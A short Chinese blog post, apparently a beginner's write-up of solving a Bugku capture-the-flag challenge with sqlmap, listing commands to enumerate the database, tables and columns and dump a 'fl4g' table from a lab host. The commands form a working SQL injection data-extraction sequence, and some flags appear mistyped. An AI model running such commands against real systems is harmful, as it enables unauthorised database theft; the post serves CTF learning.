本来bugku的那道已经做出来了,但我还是想试试sqlmap到底该怎么使用:
根据上篇文章的信息:我们首先用sqlmap查询数据库:
sqlmap -u ‘url’ --data=’’ --current-db
套入我们的数据
sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ --current-db
查询出数据库名,然后再查出表名:
sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ -D 数据库名 --tables
套入我们的数据:
sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ -D skctf --tables
然后再查出列名:
sqlmap -u ‘http://114.67.246.176:17889’ --data=‘id=1’ -T 表名 --columns
套入我们的数据
sqlmap -u ‘http://114.67.246.176:17889/’ --data ‘id=1’ -t fl4g --columns
然后再将表的数据导出来:
sqlmap -u ‘http://114.67.246.176:17889/’ --data ‘id=1’ -t fl4g --dump
这里不知道为什么两种表的数据都导出来了,感觉没理解透:
拿下
sqlmap初体验
最新推荐文章于 2022-04-27 12:51:29 发布